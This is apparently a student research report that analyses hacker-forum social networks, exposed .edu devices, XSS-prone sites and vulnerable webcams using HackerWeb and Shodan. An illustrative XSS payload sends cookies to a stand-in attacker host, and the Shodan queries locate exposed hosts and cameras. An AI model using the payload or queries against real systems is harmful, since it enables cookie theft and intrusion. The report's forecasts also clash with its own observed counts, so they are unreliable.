
Analyzing collaboration in hacker forums, .edu domain … · 2017-05-10 · Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks


Analyzing collaboration in hacker forums, .edu domain vulnerabilities and cross site scripting attacks

Krittika Patil, Eller College of Management, University of Arizona

Karan Dhingra, Eller College of Management, University of Arizona

Damini Khurana, Eller College of Management, University of Arizona

Akash Agrawal, Eller College of Management, University of Arizona

Introduction

This research was conducted by MIS graduate students at the University of Arizona in an attempt to understand current cyber security vulnerabilities, the potential risks associated with them, and past attack events. The scope of the research was to explore cyber threats across domains, using HackerWeb and Shodan as data sources. This report and its appendices describe the network environment, the devices and websites connected to it, and the results of the research conducted. A brief summary of the key findings and their priorities is given here. The priority of a finding was determined by combining the worst-case impact of its vulnerability, if exploited, with the likelihood of that vulnerability being exploited. The impact and likelihood for a particular finding were determined based on analysis of the … Websites and web applications are among the leading targets of cyber attacks, if not the leading target.

Research Questions

1) Hackers have traditionally collaborated through strong communities, extending mutual support and building a sense of ‘hacker ethic’. No longer restricted by geographical location, hacker communities now operate online and mostly group themselves by language and area of interest. HackerWeb offers a goldmine of information for studying the hierarchical and collaborative structure of these forums. This paper elaborates on:

The extent of collaboration between hackers in the different HackerWeb forums, based on the language of the forum

A comparison of the social structures of the forums based on the language of the forum

The different kinds of hierarchies seen in hacker forums

2) In the vast education domain, digital information is critical to the functioning of institutions as well as to research. Given their interrelated organizational structures, traditional security ‘boundaries’ might not be a practical option, exposing educational servers and data to sophisticated cyber attacks and potentially enabling theft of valuable research, identity and even financial data. This exposes an unlikely ‘industry’ to the dark side of the internet (Marc Gaffan, n.d., retrieved 25 Feb 2014 from http://www.incapsula.com/blog/top-security-threats-and-attackers-by-country.html). Using Shodan, we aim to discuss: What are the trends in susceptible devices and servers in the education domain?

a. Over time, which countries' educational institutions are most vulnerable to this attack?

b. Extrapolating the trends in volumes of potentially susceptible devices to the near future, can we predict how these volumes will increase/decrease?

3) A) The increasingly popular and particularly malicious cross-site scripting (XSS) attack can lead to theft of credit card information and user credentials, and can even redirect users to malware-hosting domains. Through this question, we aim to understand the concentration of XSS-vulnerable devices as a function of the distribution of internet-enabled devices across the world:

What is the correlation between cross-site scripting vulnerability and the number of internet users in various countries?

Do XSS-vulnerable device volumes increase with increasing internet penetration, or are the two patterns unrelated?

B) Webcams and IP cameras are especially exposed to remote viewing and control, as clearly demonstrated through their prevalence on Shodan. Backdoors are easily installed since passwords are often left on default settings, protective settings are not turned on, and users are not sufficiently aware of these loopholes, leaving them exposed to voyeurism, theft and malicious targeting. Building on the correlations discussed above, the questions we explore in the webcam context are:

Does vulnerability volume relate to the number of internet-using devices? Or to internet penetration percentages? Or is it more a factor of seemingly unrelated economic status?

In a more positive context, is the trend of using internet-enabled cameras more prevalent in countries with a high internet-penetration percentage?

Comparing within a list of under-developed, developing and developed countries, can we establish any correlation between standard of living and the prevalence of vulnerable net-cams?

C) How do the parameters discussed above (standard of living, webcam usage, internet penetration, etc.) compare with each other?

Literature Review

Know Your Enemy: The Social Dynamics of Hacking - Holt, Kilger (2012)

This paper series performs an in-depth analysis of the social aspect of hacker forums. Extensive research has been conducted on the technological aspect of hacking; however, there is relatively little information on the human element of hacker forums. Understanding the social dynamics of a forum can provide insight into how hacking information is transmitted through it. The paper describes various characteristics observed in hacker forums, such as the ‘composition of skill’, the ‘social relationships in the hacker subculture’ and the ‘motivations for hacking’.

Cross-Site Scripting Worms & Viruses - The Impending Threat & the Best Defense - Jeremiah Grossman, Founder and CTO, WhiteHat Security (2012)

Cross-site scripting is one of the two most prevalent vulnerability classes. One white paper describes the rise of XSS attacks, while another reports that XSS, together with SQL injection, holds the top two spots among vulnerabilities across all countries in the world. XSS exploit code, typically written in JavaScript, executes within the victim's web browser and enables theft of browser cookies, which can then be used to hijack online user accounts.
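To make this mechanism concrete, the following minimal Python sketch (our own illustration, not code from the cited white papers) contrasts a page that echoes user input into HTML verbatim with one that escapes it using the standard library's html.escape. The function names and the attacker URL are hypothetical.

```python
import html

# Hypothetical attacker-controlled input: a script that would send the
# victim's cookies to a third-party host if the browser executed it.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def render_unsafe(name: str) -> str:
    """Reflect user input into HTML verbatim (vulnerable to reflected XSS)."""
    return f"<p>Hello, {name}!</p>"


def render_safe(name: str) -> str:
    """Escape &, <, > and quotes so the browser treats the input as text."""
    return f"<p>Hello, {html.escape(name)}!</p>"


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))  # contains a live <script> element
    print(render_safe(PAYLOAD))    # contains &lt;script&gt; instead
```

When the unsafe output is served, the browser parses the payload as a script element and runs it; in the escaped output the same characters are displayed as inert text.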

Client-side cross-site scripting protection (30 April 2009) - Engin Kirda, Nenad Jovanovic, Christopher Kruegel, Giovanni Vigna

This paper describes Noxes, a tool that protects clients from XSS attacks. It outlines the different types and methods of XSS attacks and how Noxes can protect a client machine from them. The tool acts as a web proxy through which the browser's normal requests pass. Malicious requests can be detected and blocked by the tool, which acts as a personal web firewall, and in this way the risks from XSS attacks can be mitigated.
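The request-filtering idea behind such a proxy can be illustrated with a much-simplified Python sketch. It is our own approximation under stated assumptions, not Noxes' actual rule engine: a request is allowed if it targets the page's own host or a host on an explicit allow-list, and blocked otherwise, since sending data to a third-party host is a typical way for injected script to leak a stolen cookie. The function name and the allowed_hosts parameter are hypothetical.

```python
from urllib.parse import urlsplit


def is_request_allowed(page_url: str, request_url: str, allowed_hosts: set) -> bool:
    """Allow same-host requests and requests to explicitly allowed hosts.

    Simplified, hypothetical rule set in the spirit of a personal web
    firewall; it is not the rule engine of any specific tool.
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    target_host = (urlsplit(request_url).hostname or "").lower()
    if not target_host:
        # Relative URLs resolve against the page's own host.
        return True
    return target_host == page_host or target_host in allowed_hosts
```

For example, with allowed_hosts = {"cdn.example.edu"}, an image request from a forum page to its own host passes, while a request to http://attacker.example/?c=... would be blocked. A real tool would also need to handle subdomains, redirects and user prompts, which this sketch omits.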


Universities UK (2013). Cyber security and universities: managing the risk. Retrieved from http://www.universitiesuk.ac.uk/highereducation/Documents/2013/CyberSecurityAndUniversities.pdf

This paper discusses higher education institutions’ increased exposure to cyber attacks and the reasons for these vulnerabilities. It goes on to suggest methods to safeguard university servers and data from malicious attacks, presenting comprehensive solutions and a data management plan.

PÉREZ-PEÑA, R. (2013, July 16). Universities Face a Rising Barrage of Cyberattacks. The New York Times [New York]. Retrieved from http://www.nytimes.com/2013/07/17/education/barrage-of-cyberattacks-challenges-campus-culture.html?pagewanted=all&_r=0

This article helped us recognize the increasing trend of cyber attacks on educational institutions and the types of attacks being reported recently.

What follows is a question-based breakdown of the procedure used to find answers to the questions listed earlier.

I] Hackers have traditionally collaborated through strong communities, extending mutual support and building a sense of ‘hacker ethic’. No longer restricted by geographical location, hacker communities now operate online and mostly group themselves by language and area of interest. HackerWeb offers a goldmine of information for studying the hierarchical and collaborative structure of these forums. This paper elaborates on:

The extent and methods of collaboration between hackers in the different HackerWeb forums, based on the language of the forum

Research Design

Using the MySQL database of HackerWeb, we extracted the threads on which multiple forum users have collaborated. Each thread comprises multiple posts, each associated with a user (author) of the forum. Using simple SQL queries, we extracted the list of threads on each forum along with the users who posted in each thread. We found that a large number of users in the forums were ‘non-participative’, defined as having made fewer than 5 posts. Because a forum is more accurately represented by the users who are sufficiently active on it, we filtered these users out of our analysis. We then performed social network analysis on the resulting dataset using Gephi, with the ‘Force Atlas’ layout algorithm for visualizing the network. In the Gephi graph, authors are the ‘nodes’, and an ‘edge’ connects two authors who have posted on the same thread; the thickness of an edge represents the extent of communication between the two authors. The resulting graph of all authors (excluding the non-participative ones) shows that most forums’ users form a number of small communities, and some users (probably the experienced ones) belong to several such communities. We grouped the forums by the language spoken in them: English, Russian, Arabic and Chinese (Mandarin).

We also wrote SQL queries to extract the reputation score of each user on each forum. Rather than compare across forums, we wanted to understand the different kinds of hierarchies followed on hacker forums. A hierarchy indicates how information flows in a forum: a strict hierarchy indicates that only a few users dominate the posting of information, whereas the absence of a strict hierarchy indicates that information flows in all directions without an ostensible order. After extracting this information from the HackerWeb database, we used the reputation scores as inputs to Gephi to construct visualizations.
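The filtering and edge construction described above can be sketched in Python. This is a minimal illustration under stated assumptions: the posts are assumed to have already been pulled from the HackerWeb database as (thread_id, author) pairs (the actual table and column names are not given here), the five-post cutoff follows the definition above, and edges are undirected with a weight equal to the number of threads two authors share. Gephi computes average degree itself; the helper below only mirrors the undirected definition 2E/N (for a directed graph, average in-degree and out-degree are both E/N).

```python
from collections import Counter, defaultdict
from itertools import combinations

MIN_POSTS = 5  # users with fewer posts are treated as "non-participative"


def build_coposting_graph(posts):
    """Build a weighted, undirected co-posting network.

    posts: iterable of (thread_id, author) pairs, one per post.
    Returns (nodes, edges): the set of active authors, and a Counter that
    maps a sorted author pair to the number of threads both posted in.
    """
    posts = list(posts)
    post_counts = Counter(author for _, author in posts)
    active = {a for a, n in post_counts.items() if n >= MIN_POSTS}

    # Collect the distinct active authors of each thread.
    thread_authors = defaultdict(set)
    for thread_id, author in posts:
        if author in active:
            thread_authors[thread_id].add(author)

    edges = Counter()
    for authors in thread_authors.values():
        for a, b in combinations(sorted(authors), 2):
            edges[(a, b)] += 1  # edge weight = number of shared threads
    return active, edges


def average_degree(nodes, edges):
    """Average number of distinct neighbours per node (2E / N, undirected)."""
    return 2 * len(edges) / len(nodes) if nodes else 0.0
```

The weighted edge list can be exported as a CSV edge table and loaded into Gephi, where edge weight drives the edge thickness described above.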

Findings and Discussion

An example of each of the language-based groups is shown below, along with the ‘average degree’ of its graph:

Hackhound (English forum): average degree 2.18

Xakepok (Russian forum): average degree 1.138

Hackdark (Chinese forum): average degree 1.779

Mihandownload (Arabic forum): average degree 0.979

As can be seen, the English forum Hackhound has no clear structure. Communication between authors appears unstructured, and no clear clusters or communities form. This is indicative of a highly collaborative environment. The average degree for Hackhound is 2.18, which means that each user, on average, collaborates with 2.18 other users; compared with the other forums, this is a very high value. The blue dots indicate users with a high out-degree, and Hackhound has a large number of them. This indicates that there is no clear hierarchy in the forum.

The Russian forum Xakepok is somewhat structured, with two major communities. One user, represented by the blue dot in the centre, is extremely influential in the forum, and all information exchange seems to go through this user, who may be the forum's moderator. Each of the clusters also has an internal point of contact to whom its members respond. We infer that this forum has a strict hierarchy: the central author is at the top, the internal points of contact form the second tier, and the other users form the lowest tier. The average degree of this forum is 1.138, indicating a lower level of collaboration, as is evident from the structure of the graph.

Hackdark, the Chinese forum, has a very mixed structure. While there are a few clear clusters, there are also a large number of individual users involved in highly collaborative work. A clear, dark blue dot has edges going out in all directions. This user is similar to the central user in Xakepok but handles a much larger number of disparate clusters and individual users, and could also be the moderator. This forum differs from Xakepok in that it lacks a second tier in the hierarchy: the clusters have no internal point of contact, and collaboration inside them is mixed, with no clear leader. The average degree of this graph is 1.779, a value between Hackhound’s and Xakepok’s, indicating a mix of high collaboration and clear cluster formation.

Mihandownload, the Arabic forum, has the most distinct clusters of all the forums in HackerWeb. Its average degree is only 0.979, indicating a very low degree of collaboration. There is no forum-wide hierarchy, as seen from the absence of any central node; however, each cluster has a central node around which collaboration seems to take place. Some of the clusters are loosely interconnected, but most have no common members at all, which indicates a very strict community culture.

The average degree by forum language is shown in the table below:

Language    Average Degree
English     1.818
Russian     1.253
Arabic      1.251
Chinese     1.430


Each value in the table above is the mean of the average degrees of all the forums in that language. English forums show the highest level of collaboration, while Arabic forums show the least, only marginally below Russian forums (1.251 vs. 1.253).
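The per-language aggregation is a mean of means, which can be sketched in a few lines of Python. This is an illustration only: the function name is ours, and the input mapping (forum name to language and average degree) is an assumed structure, not the study's actual data file.

```python
from collections import defaultdict
from statistics import mean


def average_degree_by_language(forums):
    """Average the per-forum average degrees within each language.

    forums: mapping of forum name -> (language, average degree).
    Returns a mapping of language -> mean of its forums' average degrees.
    """
    by_language = defaultdict(list)
    for language, avg_degree in forums.values():
        by_language[language].append(avg_degree)
    return {lang: mean(values) for lang, values in by_language.items()}
```

Called with only the four example forums reported above (Hackhound 2.18, Xakepok 1.138, Hackdark 1.779, Mihandownload 0.979), each language has a single forum, so the function simply returns those values; the table's figures differ because they average over every forum in each language.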

Further, we found two main kinds of hierarchies, shown below:

Centralized Hierarchy

Distributed Hierarchy

As shown, there are two general hierarchy structures, which we classify as ‘centralized’ and ‘distributed’. In the centralized hierarchy, typically fewer than three users (represented by the larger nodes) have extremely high reputation scores; these are the users who disseminate information to the other users in the forum. In the distributed hierarchy, several users have high reputation scores, which implies that information is disseminated without any strict structure or order.
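The two categories can be expressed as a simple rule over each forum's reputation scores. The sketch below is an illustration under explicit assumptions rather than the procedure followed in this study, which drew the categories from Gephi visualizations: ‘extremely high’ is taken, hypothetically, to mean at least ten times the forum's median reputation, and a forum is labelled centralized when one or two users clear that bar.

```python
from statistics import median

# Hypothetical cut-off: a score counts as "extremely high" when it is at
# least this many times the forum's median reputation score.
HIGH_REPUTATION_FACTOR = 10


def classify_hierarchy(reputations):
    """Return ('centralized' or 'distributed', list of high-reputation users).

    reputations: mapping of user name -> reputation score for one forum.
    Centralized: one or two users stand far above the rest.
    Distributed (our assumption): three or more such users, or none at all.
    """
    if not reputations:
        raise ValueError("no reputation scores")
    # max(..., 1) keeps the threshold positive when most scores are zero.
    threshold = HIGH_REPUTATION_FACTOR * max(median(reputations.values()), 1)
    high = sorted(u for u, s in reputations.items() if s >= threshold)
    label = "centralized" if 1 <= len(high) < 3 else "distributed"
    return label, high
```

Using the median rather than the mean as the baseline keeps a single dominant moderator from inflating the threshold and hiding themselves.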

II] In the vast education domain, digital information is critical to the functioning of institutions as well as to research. Given their interrelated organizational structures, traditional security ‘boundaries’ might not be a practical option, exposing educational servers and data to sophisticated cyber attacks and potentially enabling theft of valuable research, identity and even financial data. This exposes an unlikely ‘industry’ to the dark side of the internet. Using Shodan, we aim to discuss: What are the trends in susceptible devices and servers in the education domain?

a) Over time, which countries' educational institutions are most vulnerable to this attack?

b) Extrapolating the trends in volumes of potentially susceptible devices to the near future, can we predict how these volumes will increase/decrease?

Research Design

The research design drew on two main sources: HackerWeb and Shodan. Data were collected in two phases, with the focus on discovering potentially vulnerable devices, websites and servers hosted on educational domains. First, we queried Shodan for devices matching the filter hostname:.edu, excluding those that returned a 400-series (denial) response; second, we restricted the results to devices on which ‘Anonymous Login’ succeeded. The Shodan result set for this query was extracted with Python through the Shodan API.

Analysis: A) A Python script exported the location parameters of the Shodan results (longitude, latitude, city and country code) to a CSV file to facilitate analysis and visualization. We analyzed these data in Tableau to understand the distribution of this vulnerability across educational centres in cities around the world, using a Filled Map to superimpose a color-density distribution on the world map. B) To study increasing or decreasing trends in vulnerable devices in the education domain, we used another Python script to retrieve the dates on which Shodan recorded these vulnerable devices, using Shodan's ‘after’ filter to limit results to recent years, and exported the results to MS Excel.
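The collection and CSV export in A) can be sketched with the official shodan Python package. This is a minimal sketch under stated assumptions: the query string is a hypothetical stand-in (the exact query used in the study is not reproduced here), and the location fields are read from the ‘location’ dictionary that Shodan attaches to each banner. The network call is isolated in fetch_matches so the export logic can be tried offline.

```python
import csv

# Hypothetical query: the study's exact query string is not given in the text.
QUERY = 'hostname:.edu "Anonymous user logged in"'
FIELDS = ["ip_str", "city", "country_code", "latitude", "longitude"]


def location_rows(matches):
    """Flatten Shodan banner dicts into rows of location fields."""
    for match in matches:
        loc = match.get("location") or {}
        yield {
            "ip_str": match.get("ip_str"),
            "city": loc.get("city"),
            "country_code": loc.get("country_code"),
            "latitude": loc.get("latitude"),
            "longitude": loc.get("longitude"),
        }


def export_csv(matches, path):
    """Write one CSV row per banner, ready to load into Tableau."""
    with open(path, "w", newline="", encoding="utf-8") as fh:
        writer = csv.DictWriter(fh, fieldnames=FIELDS)
        writer.writeheader()
        writer.writerows(location_rows(matches))


def fetch_matches(api_key, query=QUERY, limit=1000):
    """Fetch up to `limit` banners with the `shodan` package (needs an API key)."""
    import shodan  # imported lazily so the helpers above work without it

    api = shodan.Shodan(api_key)
    matches = []
    for banner in api.search_cursor(query):
        matches.append(banner)
        if len(matches) >= limit:
            break
    return matches
```

Typical usage would be export_csv(fetch_matches("YOUR_API_KEY"), "edu_anonymous_login.csv"); the limit guards against exhausting query credits on a broad search.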


The raw exported data were cleaned and grouped by date using Excel pivot tables. After plotting the counts on a scatter plot, we ran a regression analysis using Excel's Data Analysis ToolPak. The trend was best fitted by a second-degree polynomial rather than a linear function of time, and the resulting equation was used to predict the number of vulnerable devices likely to be found in the near future. For the prediction, ‘Date’ was converted to a numerical ‘day number’, starting from the first day for which data are available.
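The study used Excel for this step; as a tool-independent sketch, the same pipeline can be written in plain Python: group Shodan timestamps by day, convert dates to day numbers starting at 1, fit a second-degree polynomial by ordinary least squares, and evaluate it at future day numbers. The function names are ours, and since the study's fitted coefficients are not reported, none are hard-coded here.

```python
from collections import Counter
from datetime import date


def daily_counts(timestamps):
    """Count banners per day from ISO timestamps ('YYYY-MM-DDTHH:MM:SS...')."""
    return Counter(date.fromisoformat(ts[:10]) for ts in timestamps)


def to_day_numbers(counts):
    """Convert {date: count} into (day_number, count) pairs, day 1 = first date."""
    first = min(counts)
    return [((d - first).days + 1, n) for d, n in sorted(counts.items())]


def fit_quadratic(points):
    """Least-squares fit of y = a + b*x + c*x**2 via the normal equations."""
    if len({x for x, _ in points}) < 3:
        raise ValueError("need at least three distinct x values")
    # Power sums of x and of x**k * y that form the 3x3 normal equations.
    s = [sum(x ** k for x, _ in points) for k in range(5)]
    t = [sum((x ** k) * y for x, y in points) for k in range(3)]
    m = [[s[0], s[1], s[2], t[0]],
         [s[1], s[2], s[3], t[1]],
         [s[2], s[3], s[4], t[2]]]
    # Gauss-Jordan elimination with partial pivoting.
    for col in range(3):
        pivot = max(range(col, 3), key=lambda r, c=col: abs(m[r][c]))
        m[col], m[pivot] = m[pivot], m[col]
        for r in range(3):
            if r != col:
                f = m[r][col] / m[col][col]
                m[r] = [vr - f * vc for vr, vc in zip(m[r], m[col])]
    return tuple(m[i][3] / m[i][i] for i in range(3))  # (a, b, c)


def predict(coeffs, x):
    """Evaluate the fitted polynomial at day number x."""
    a, b, c = coeffs
    return a + b * x + c * x * x
```

A typical call chain is coeffs = fit_quadratic(to_day_numbers(daily_counts(timestamps))) followed by predict(coeffs, future_day_number). Because the quadratic term dominates far from the data, predictions degrade quickly outside the observed range.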

Findings and Discussion


A) The charts and figures above depict a concentration of vulnerabilities in a few prominent educational cities. We found a large hub in Taipei, Taiwan, a city with a large number of prestigious universities, no fewer than 8 of which are ranked among the top universities in the world (source: 2013/14 QS World University Rankings). Seattle, also a prominent city and a celebrated educational centre, is likewise high on the list, with an alarmingly large number of susceptible devices. On the other hand, Chicago, another very large educational hub housing more than 10 major universities, shows surprisingly few exposed devices, suggesting that its institutions have better protective and preventive measures in place to protect valuable research.

B) Analyzing the volume of exposed devices over time, we observed a clear and sharp increase in devices found over the last month, continuing an upward trend that began in October 2013 and was preceded by a low plateau over the previous year. Extrapolating these results, we predict a continuing increase, with more devices being discovered over March and April. We limited the prediction to a few months ahead, since extrapolating a fitted polynomial further into the future quickly becomes unreliable.

Date          No. of Devices Found
…             …
2/15/2014     29
2/16/2014     48
2/17/2014     35
2/18/2014     44
2/19/2014     61
2/20/2014     58
2/21/2014     46
2/22/2014     84
2/23/2014     71
2/24/2014     16
3/6/2014      28.314 (predicted)
3/16/2014     30.752 (predicted)
3/26/2014     33.29 (predicted)

III] A) The increasingly popular and particularly malicious cross-site scripting (XSS) attack can lead to theft of credit card information and user credentials, and can even redirect users to malware-hosting domains. Through this question, we aim to understand the concentration of XSS-vulnerable devices as a function of the distribution of internet-enabled devices across the world:

What is the correlation between cross-site scripting vulnerability and the number of internet users in various countries?

Do XSS-vulnerable device volumes increase with increasing internet penetration, or are the two patterns unrelated?

B) Webcams and IP cameras are especially exposed to remote viewing and control, as clearly demonstrated by their prevalence on Shodan. Backdoors are easily installed since passwords are often left at default settings, protective settings are not turned on, and users are not sufficiently aware of these loopholes, leaving them exposed to voyeurism, theft and malicious targeting. Building on the correlations discussed above, the questions we explore in the webcam context are:

Does vulnerability volume relate to the number of internet-using devices? Or to internet penetration percentages? Or is it more a factor of seemingly unrelated economic status?

In a more positive context, is the trend of using internet-enabled cameras more prevalent in countries with a high internet-penetration percentage?

Comparing within a list of under-developed, developing and developed countries, can we establish any correlation between standard of living and the prevalence of vulnerable net-cams?

C) How do the parameters discussed above (standard of living, webcam usage, internet penetration, etc.) compare with each other?

Research Design

By querying HackerWeb and analyzing the posts with the RapidMiner text-mining tool, we found that XSS attacks were one of the most common tools hackers use to exploit web application layer vulnerabilities for malicious ends such as identity theft and access to sensitive, restricted information. This led us to select XSS attacks as a field of study. The X-XSS-Protection HTTP response header controls the XSS filter built into some browsers: a value of 1, the default in those browsers, enables the filter, whereas a server that sends X-XSS-Protection: 0 disables it, leaving its visitors more exposed to XSS attacks. We therefore used this header setting to identify potentially XSS-vulnerable sites. In our research, we analyze the association between XSS vulnerability, internet penetration and standard of living. The standard-of-living and internet-penetration ratings of the various countries were obtained from the following sources:

http://www.numbeo.com/quality-of-life/rankings_by_country.jsp and http://www.itu.int/ (aggregated by http://en.wikipedia.org/)
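Shodan stores the raw response headers of each HTTP banner, so the header-based selection can also be checked locally on downloaded banners. The following minimal Python sketch (our illustration; the function name is hypothetical) returns True when a banner's headers disable the browser XSS filter. It assumes the banner text begins with the HTTP status line, as raw HTTP responses do.

```python
def xss_filter_disabled(banner: str) -> bool:
    """Return True if a raw HTTP response banner sends X-XSS-Protection: 0.

    Header names are matched case-insensitively; the value may carry a
    trailing semicolon or parameters, e.g. "0;" or "1; mode=block".
    """
    for line in banner.splitlines()[1:]:  # skip the status line
        if not line.strip():
            break  # a blank line ends the header block
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "x-xss-protection":
            return value.strip().split(";")[0].strip() == "0"
    return False
```

Parsing the header, rather than relying only on the text search, avoids counting banners where the string appears in the response body instead of the headers.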

The analysis consisted of the following steps:

1) Searching, through the Shodan API, for devices and websites vulnerable to XSS attacks using the search string “X-XSS-Protection: 0;”.

2) Parsing the Shodan results by country using Python code, as shown in the screenshot.

3) Choosing the relevant countries so that the segments based on internet penetration and number of internet users, along with XSS-vulnerable sites, are equally represented.

4) Creating a pivot table to determine the distribution of vulnerable devices by country.

5) To capture the association between vulnerable webcams and internet penetration, the following steps were also followed:

a) Searching Shodan through the Shodan API for vulnerable webcams with the search string “webcam http 200 ok”.

b) Segregating the results by country, latitude and longitude by parsing the Shodan output with Python.

c) Populating the results automatically into a spreadsheet from the Shodan API output.

d) Creating a pivot table to determine the count of vulnerable webcams.
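Steps 2 and 4 (and the corresponding webcam steps b and d) amount to grouping Shodan banners by country and counting them, which is what the pivot tables do in Excel. A minimal Python equivalent is sketched below, assuming the banners have already been fetched with search strings such as those listed above and that each carries Shodan's ‘location’ dictionary; the function name is ours.

```python
from collections import Counter


def count_by_country(matches):
    """Pivot Shodan banners into a {country name: device count} table."""
    return Counter(
        (m.get("location") or {}).get("country_name") or "Unknown"
        for m in matches
    )
```

For example, count_by_country(xss_matches).most_common(10) lists the ten countries with the most XSS-vulnerable devices; running the same function on the webcam results gives the webcam counts per country.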

Findings and Discussion

The chart below depicts the correlation between the number of internet users, internet penetration, XSS-vulnerable devices and vulnerable webcams. After counting the XSS-vulnerable devices and webcams, we computed a correlation matrix to capture the association between internet penetration and XSS-vulnerable devices; the findings are shown in the table below. The correlation matrix shows the strongest positive correlation (0.96) between internet penetration and XSS-vulnerable devices, which suggests that as internet penetration increases across countries, the number of XSS-vulnerable devices increases as well.

We plotted another graph to examine the correlation between the standard of living of various countries and vulnerable webcams, and found a positive correlation (0.71). This suggests that countries with a higher standard of living tend to have more internet-enabled cameras, leaving these devices susceptible to cyber attacks and cyber vulnerabilities.
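The correlation coefficients reported here are Pearson coefficients computed over per-country values. As a hedged sketch (the study used a spreadsheet; the function names below are ours), the same lower-triangular matrix can be computed in plain Python, given one list of values per variable with the countries in the same order in every list.

```python
from math import sqrt


def pearson(xs, ys):
    """Pearson correlation coefficient of two equal-length sequences."""
    n = len(xs)
    if n != len(ys) or n < 2:
        raise ValueError("need two sequences of equal length >= 2")
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sx = sqrt(sum((x - mx) ** 2 for x in xs))
    sy = sqrt(sum((y - my) ** 2 for y in ys))
    return cov / (sx * sy)


def correlation_matrix(columns):
    """Lower-triangular correlation matrix keyed by (row, column) names.

    columns: mapping of variable name -> per-country values (same order).
    """
    names = list(columns)
    return {
        (a, b): pearson(columns[a], columns[b])
        for i, a in enumerate(names)
        for b in names[: i + 1]
    }
```

With only a handful of countries in each list, a single outlying country can move r substantially, so the per-country values are worth inspecting alongside the coefficients.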


Acknowledgments

We would like to extend special appreciation to our advisor, Dr. Chen, and the University of Arizona’s AI Lab for providing the Shodan and HackerWeb data sets to facilitate our research, as well as for their constant guidance and support. We would also like to acknowledge the authors of the many white papers, news articles and discussion blogs that were instrumental in helping us frame hypotheses, source data and form the basis for our research topics.

                          XSS Vulnerable Devices   Internet Penetration
XSS Vulnerable Devices    1
Internet Penetration      0.958641529              1
No of Internet Users      0.791323743              0.58458
Vulnerable Webcams        0.73011927               0.894406563

                          Vulnerable Webcams       Standard of Living
Vulnerable Webcams        1
Standard of Living        0.713099804              1

[Figure: Correlation Chart. XSS Vulnerable Devices, Internet Penetration, No of Internet Users and Vulnerable Webcams for India, Iran, Russia, US, Germany, United Kingdom, Japan and Egypt]

[Figure: Correlation between Vulnerable Webcams and Standard of Living of Countries]


REFERENCES

[1] Universities UK (2013). Cyber security and universities: managing the risk. Retrieved from http://www.universitiesuk.ac.uk/highereducation/Documents/2013/CyberSecurityAndUniversities.pdf

[2] PÉREZ-PEÑA, R. (2013, July 16). Universities Face a Rising Barrage of Cyberattacks. The New York Times [New York]. Retrieved from http://www.nytimes.com/2013/07/17/education/barrage-of-cyberattacks-challenges-campus-culture.html?pagewanted=all&_r=0

[3] http://www.numbeo.com/quality-of-life/rankings_by_country.jsp

[4] http://www.itu.int/ (aggregated by http://en.wikipedia.org/)

[5] http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks/

[6] http://www.hpenterprisesecurity.com/collateral/report/2011FullYearCyberSecurityRisksReport.pdf

[7] http://www.nowires.org/Papers-PDF/ICGeS_egov.pdf

[8] https://bora.uib.no/bitstream/handle/1956/1901/Paper_7_Moen.pdf?sequence=36

[9] http://praetorianprefect.com/archives/2010/10/paypal-sender-country-xss/

[10] http://www.numbeo.com/quality-of-life/rankings_by_country.jsp